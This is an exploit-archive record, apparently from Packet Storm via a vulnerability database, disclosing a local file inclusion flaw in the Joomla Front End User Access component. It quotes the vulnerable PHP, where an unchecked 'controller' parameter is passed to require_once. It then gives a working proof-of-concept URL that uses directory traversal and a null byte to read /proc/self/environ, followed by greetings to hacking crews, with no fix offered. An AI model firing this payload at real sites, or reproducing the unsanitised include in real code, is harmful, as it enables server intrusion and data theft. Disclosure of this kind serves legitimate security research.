Joomla Front End User Access Local File Inclusion

2011-01-31T00:00:00

Description

{"id": "PACKETSTORM:98002", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Joomla Front End User Access Local File Inclusion", "description": "", "published": "2011-01-31T00:00:00", "modified": "2011-01-31T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/98002/Joomla-Front-End-User-Access-Local-File-Inclusion.html", "reporter": "wishnusakti", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:16:45", "viewCount": 16, "enchantments": {"score": {"value": -0.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.2}, "sourceHref": "https://packetstormsecurity.com/files/download/98002/joomlafrontend-lfi.txt", "sourceData": "` ================================================================================================ \n \nTitle : Joomla Component Front End User Access LFI Vulnerability \nDeveloper: Carsten Engel \nDownload : http://www.pages-and-items.com/downloads/com_frontend-user-access_v3.4.0_j1.5_free.zip \nVersion : \nDate : Sunday, 30 january 2011 - GMT +07:00 Jakarta, Indonesia \nAuthor : wishnusakti + inc0mp13te \nContact : wishnusakti[at]gmail.com \n \n================================================================================================ \n \n[+] Vulnerable \n \n// Require specific controller if requested \nif($controller = JRequest::getVar('controller')) { \nrequire_once (JPATH_COMPONENT.DS.'controllers'.DS.$controller.'.php'); \n} \n \n[+] Exploit \n \nhttp://[site]/[path]/index.php?option=com_frontenduseraccess&controller=[LFI] \n \n[+] PoC \n \nhttp://localhost/index.php?option=com_frontenduseraccess&controller=../../../../../../../../../../proc/self/environ%00 \n \n \n================================================================================================ \n \nVery Special thanks : \n \nPenghuni priv8 Server \n \n(ander, NoGe, zxvf, kaka11, s4va, meylira, Jack, aJe, Unyil, s4va, cheche angela zhang, madonk, & Bot\u00b2 Scan :D) \n \n \nen Semua Komunitas Hacking Tanah Air \n \nPeace Yo :) \n \n \nto all my friends : \n \ncakill, aurell, hafiz, xco, xshadow, gblack, krembis, biakkobar, hendri_note \n================================================================================================ \n \n# ./wishnusakti + inc0mp13te \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1646634359}}